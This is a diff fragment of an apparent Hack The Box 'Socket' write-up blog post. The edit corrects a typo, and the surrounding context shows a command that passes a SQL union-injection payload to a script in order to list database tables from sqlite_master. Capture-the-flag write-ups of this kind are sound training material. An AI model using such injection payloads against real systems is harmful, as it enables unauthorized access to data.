s0ck37/s0ck37.github.io/_posts/2023-07-29-htb-writeup-socket.md

 {"message": {"id": 1, "version": 2, "released_date": 3, "downloads": 4}}
 ```

-So know that we know that we can perform a union injection, we can dump all table names:
+So now that we know that we can perform a union injection, we can dump all table names:

 ```
 history ~ $ python3 web.py '0" UNION SELECT 1,2,group_concat(tbl_name),4 FROM sqlite_master WHERE type="table" and tbl_name NOT like "sqlite_%"-- -'